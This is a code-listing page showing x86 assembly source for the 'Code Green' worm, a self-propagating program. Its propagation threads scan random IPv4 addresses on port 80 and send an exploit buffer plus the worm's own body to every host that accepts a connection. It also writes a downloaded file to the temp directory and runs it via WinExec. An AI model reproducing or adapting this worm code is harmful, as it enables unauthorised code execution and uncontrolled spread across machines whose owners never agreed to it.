📄 codegreen.asm
字号:
push 0 ;dwCreationFlags [0: run immediately]
push ebp ;lpParameter
lea eax, [ebp][RandomGenerator]
push eax ;lpStartAddress
push 0 ;dwStackSize [0: default size]
push 0 ;lpThreadAttrib [0: defaulte secdescriptor]
call [ebp][ProcTable+API_CreateThread] ;RetVal: hThread
pop eax
Initialise_Critical_Sections:
lea eax, [ebp][CritSec_GetIP]
push eax
call [ebp][ProcTable+API_InitializeCriticalSection]
lea eax, [ebp][CritSec_SendCG]
push eax
call [ebp][ProcTable+API_InitializeCriticalSection]
Propagation_ThreadLoop:
push 0
push esp ;lpThreadId
push 0 ;dwCreationFlags [0: run immediately]
push ebp ;lpParameter
lea eax, [ebp][_ThreadFunction]
push eax ;lpStartAddress
push 0 ;dwStackSize [0: default size]
push 0 ;lpThreadAttrib [0: defaulte secdescriptor]
call [ebp][ProcTable+API_CreateThread] ;RetVal: hThread
pop eax
push 100
call [ebp][ProcTable+API_Sleep]
cmp [ebp][NrOfThreads], word ptr MAX_NR_OF_THREADS
jl Propagation_ThreadLoop
;**********************************************************************************
;*** apply patch ***
;**********************************************************************************
_ExecutePatchFile:
cmp [ebp][DLError], byte ptr 1
jg _DoNotPatch_FreeMemory ;Jmp On Error 2 and 3
mov ebx, [ebp][LenPatchFile]
lea esi, [ebp][PatchFileName]
mov edi, [ebp][MemPointer]
call WriteFileToTempDirAndExecuteIt ;EBX:FileSize ;ESI->TempFileName("Temp.exe") ;EDI->Buffer2Write
_DoNotPatch_FreeMemory:
push MEM_RELEASE
push 0 ;0070000h ;ca. 450kb
push [ebp][MemPointer]
call [ebp][ProcTable+API_VirtualFree]
;**********************************************************************************
;*** code green epilogue ***
;**********************************************************************************
_Epilogue:
mov ecx, 6
Main_WaitLoop:
push ecx
push 1200000 ;20 mins
call [ebp][ProcTable+API_Sleep]
Main_StartRandomIPSearchAgain:
lea edx, [ebp][CritSec_GetIP] ;EnterCriticalSection
push edx
call [ebp][ProcTable+API_EnterCriticalSection]
mov [ebp][CurrentIP], dword ptr 0
lea edx, [ebp][CritSec_GetIP] ;LeaveCriticalSection
push edx
call [ebp][ProcTable+API_LeaveCriticalSection]
pop ecx
loop Main_WaitLoop
_End_Main:
_End_Main_SetEndThreadsFlag:
mov [ebp][EndThreadsFlag], byte ptr 1
push 5000
call [ebp][ProcTable+API_Sleep]
_BuildCodeGreen_DestroyStack:
mov eax, [ebp][ptrNewCodeGreen]
mov ecx, [eax]
inc ecx
DestroyStackLoop:
pop eax
loop DestroyStackLoop
_Delete_Critical_Sections:
lea eax, [ebp][CritSec_GetIP]
push eax
call [ebp][ProcTable+API_DeleteCriticalSection]
lea eax, [ebp][CritSec_SendCG] ;?
push eax
call [ebp][ProcTable+API_DeleteCriticalSection] ;?
_EndCodeGreenExecution_InfiniteLoop:
push 2678400000
call [ebp][ProcTable+API_Sleep]
jmp _EndCodeGreenExecution_InfiniteLoop
;**********************************************************************************
;*** propagation thread ***
;**********************************************************************************
_ThreadFunction:
mov ebp, [esp+4]
inc word ptr [ebp][NrOfThreads]
ThreadInitialisation:
mov ecx, 72
ThreadInit_Loop: ;reserve Stack-Mem (
push 0
loop ThreadInit_Loop
mov ebx, esp ;EBX -> TempStackMem
ThreadLoop:
cmp [ebp][EndThreadsFlag], byte ptr 1
je ThreadCleanup ;end thread
cmp [ebp][CurrentIP], 0
jne ThreadLoop_GetCurrentIP
ThreadLoop_GenerateRandomIP:
xor [ebp][RandVal], esp
mov eax, [ebp][RandVal]
jmp ThreadLoop_VerifyIP
ThreadLoop_GetCurrentIP:
lea edx, [ebp][CritSec_GetIP] ;EnterCriticalSection
push edx
call [ebp][ProcTable+API_EnterCriticalSection]
inc dword ptr [ebp][CurrentIP] ;GetCurrentIP
mov eax, [ebp][CurrentIP] ;eax: CurrentIP
push eax
lea edx, [ebp][CritSec_GetIP] ;LeaveCriticalSection
push edx
call [ebp][ProcTable+API_LeaveCriticalSection]
pop eax
ThreadLoop_VerifyIP:
mov edx, eax
and edx, 7F000001h ;7FFFFFFDh ;for debug purposes
cmp edx, 7F000001h ;7FFFFFFDh ;for debug purposes
je ThreadLoop_ConnectToIP ;accept this IP
mov edx, eax
and edx, 7F000000h ;127.x.x.x
cmp edx, 7F000000h
je ThreadLoop_ResetIP
mov edx, eax
and edx, 0E0000000h ;224.x.x.x
cmp edx, 0E0000000h
je ThreadLoop_ResetIP
jmp ThreadLoop_ConnectToIP
ThreadLoop_ResetIP:
lea edx, [ebp][CritSec_GetIP] ;EnterCriticalSection
push edx
call [ebp][ProcTable+API_EnterCriticalSection]
mov [ebp][CurrentIP], 0 ;ResetCurrentIP => random generation
lea edx, [ebp][CritSec_GetIP] ;LeaveCriticalSection
push edx
call [ebp][ProcTable+API_LeaveCriticalSection]
jmp ThreadLoop
ThreadLoop_ConnectToIP:
mov [ebx], eax ;[ebx]:CurrentIP
push IPPROTO_TCP
push SOCK_STREAM
push AF_INET
call [ebp][ProcTable+API_socket]
mov dword ptr [ebx+4], eax ;[ebx+4]: socket descriptor
lea edi, [ebx+8] ;[ebx+8]: ioctlsocket_Arg
mov [edi], dword ptr 1 ;nonblocking
push edi ;Zeiger auf Option ([ptrArg]: 0=BlockingMode 1=NonblockingMode)
push FIONBIO
push [ebx+4] ;SocketDescriptor
call [ebp][ProcTable+API_ioctlsocket]
lea edi, [ebx+12] ;[ebx+12]: sockaddr_in
mov [edi], dword ptr 50000002h ;port: 50h=80
mov eax, [ebx] ;eax:CurrentIP
mov [edi+7], al
mov [edi+6], ah
ror eax, 16
mov [edi+5], al
mov [edi+4], ah
mov [edi+8], dword ptr 0
mov [edi+12], dword ptr 0
push 16 ;NameLen
push edi ;ptrSockAddr
push [ebx+4]
call [ebp][ProcTable+API_connect]
lea edi, [ebp][SelectTimeVal]
push edi ;lpTimeVal
push 0 ;set of sockets to be checked for readability
lea edi, [ebx+28] ;[ebx+28]: fd_set
mov [edi], dword ptr 1
mov eax, [ebx+4]
mov [edi+4], eax
push edi ;lpSocket ;check for writability
push 0 ;set of sockets to be checked for errors
push 0 ;ignored
call [ebp][ProcTable+API_select]
cmp eax, SOCKET_ERROR
je ThreadLoop_CloseSocket ;ERROR
or eax, eax
jz ThreadLoop_CloseSocket ;timeval expired
ThreadLoop_VulnerableHostFound:
cmp [ebp][CurrentIP], 0
jne ThreadLoop_SendCodeGreen
cmp eax, 7FFFFFFDh
je ThreadLoop_SendCodeGreen
mov eax, [ebx]
mov [ebp][CurrentIP], eax ;eax: CurrentIP
ThreadLoop_SendCodeGreen:
lea edi, [ebx+8]
mov [edi], dword ptr 0 ;blocking
push edi ;ptrArg
push FIONBIO
push [ebx+4]
call [ebp][ProcTable+API_ioctlsocket]
;If a connected socket can't send CodeGreen and blocks, all other threads will block too.
lea edx, [ebp][CritSec_SendCG] ;Enter Critical Section
push edx
call [ebp][ProcTable+API_EnterCriticalSection]
push 0 ;flags
push CGExploitLen + CGLen ;CGMsgLen
mov edi, [ebp][ptrNewCodeGreen]
add edi, 4 ;first DD holds NrOfPushs
push edi ;ptrBuf
push [ebx+4] ;socket
call [ebp][ProcTable+API_send]
lea edx, [ebp][CritSec_SendCG] ;Leave Critical Section
push edx
call [ebp][ProcTable+API_LeaveCriticalSection]
ThreadLoop_CloseSocket:
push [ebx+4]
call [ebp][ProcTable+API_closesocket]
jmp ThreadLoop
ThreadCleanup:
mov ecx, 72
ThreadCleanup_Loop:
pop eax
loop ThreadCleanup_Loop
ret 4
;**********************************************************************************
;*** functions ***
;**********************************************************************************
SearchMZHeader: ;esi: Addr
xor si, si
sub esi, 00010000h
mov ax, [esi]
cmp ax, "ZM"
jne SearchMZHeader
ret
DetermineStringLength: ;esi -> String ;RetVal: ECX:LenStr
pushad
mov edi, esi
xor eax, eax
xor ecx, ecx
dec ecx
repne scasb
dec edi
sub edi, esi
mov [esp+24], edi
popad
ret
FindUrlTableEntry: ;esi -> UrlTable ;bh: LangID[1..31] ;RetVal: ESI -> correct table-entry
pushad
mov edi, esi
xor ecx, ecx
mov cl, bh
dec cl
jcxz EntryInUrlTableFound
xor eax, eax
FindUrlTableEntry_SearchZeroLoop:
push ecx
xor ecx, ecx
dec ecx
repne scasb
pop ecx
loop FindUrlTableEntry_SearchZeroLoop
EntryInUrlTableFound:
mov [esp+4], edi
popad
ret
RandomGenerator: ;Thread
mov ebp, [esp+4]
lea esi, [ebp][CurrentSystemTime]
push esi
call [ebp][ProcTable+API_GetSystemTime]
mov eax, [esi+12]
xor ecx, ecx
mov cl, [esi+14]
and cl, 00001111b ;ror by max 15 bits
ror eax, cl
xor eax, [ebp][RandVal]
mov [ebp][RandVal], eax
xor edx, edx
mov dl, al
and dl, 00001111b
push edx
call [ebp][ProcTable+API_Sleep]
cmp [ebp][EndThreadsFlag], byte ptr 1
jne RandomGenerator
ret 4
WriteFileToTempDirAndExecuteIt: ;EBX:FileSize ;ESI->TempFileName("Temp.exe") ;EDI->Buffer2Write
ExecuteFile_InitStack:
mov ecx, 256
InitStackLoop:
push 0
loop InitStackLoop
push edi
mov edi, esp
add edi, 4
GetTempPathName:
push edi ;lpBuf
push 1010 ;dwBufLen
call [ebp][ProcTable+API_GetTempPath] ;GetTempPathA
AddFileNameToTempPath:
pushad
add edi, eax
call DetermineStringLength
inc ecx ;plus zero at EndOfString
rep movsb
popad ;EDI -> FILENAME
CreateTempFile:
push 0
push FILE_ATTRIBUTE_NORMAL
push CREATE_ALWAYS
push 0
push 0
push GENERIC_READ or GENERIC_WRITE
push edi
call [ebp][ProcTable+API_CreateFile]
pop ecx ;ECX -> Buffer2Write
cmp eax, INVALID_HANDLE_VALUE
je ExecuteFile_ERROR
WriteToTempFile:
push eax
push 0
mov edx, esp
push 0 ;lpOverlapped
push edx ;lpNrOfBytesWritten
push ebx ;dwNrOfBytes2Write
push ecx ;lpBuffer
push eax ;hFile
call [ebp][ProcTable+API_WriteFile] ;WriteFile
cmp eax, TRUE
pop eax
pop eax
pushfd
CloseFileHandle:
push eax
call [ebp][ProcTable+API_CloseHandle]
popfd
jne ExecuteFile_ERROR
ExecutePatchFile:
push eax
push 0
push edi ;----^---- EDI->FileName
call [ebp][ProcTable+API_WinExec]
;cmp eax, 31
pop eax
;jg ERROR
ExecuteFile_ERROR:
ExecuteFile_DestroyStack:
mov ecx, 256
ExecuteFile_DestroyStackLoop:
pop eax
loop ExecuteFile_DestroyStackLoop
ret
;**********************************************************************************
;*** includes ***
;**********************************************************************************
INCLUDE CodeGreen_Variablen.INC
CGEnd EQU $
END _Entry⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -